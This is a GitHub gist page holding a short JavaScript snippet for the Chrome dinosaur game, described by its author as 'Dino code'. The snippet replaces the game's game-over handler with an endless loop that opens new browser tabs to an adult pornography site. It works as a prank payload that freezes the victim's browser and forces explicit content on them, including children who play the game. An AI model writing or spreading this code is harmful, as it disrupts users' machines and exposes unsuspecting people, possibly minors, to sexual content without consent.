Last active
September 8, 2021 09:53
-
-
Save hdboye/c19b5ad522673c06f6675094ff3d3277 to your computer and use it in GitHub Desktop.
Dino code. I tried. It sucks.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function ntab(url){ | |
window.open(url, '_blank'); | |
} | |
Runner.instance_.gameOver = function(){ | |
while(true){ | |
ntab('https://r34.app'); | |
} | |
}; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment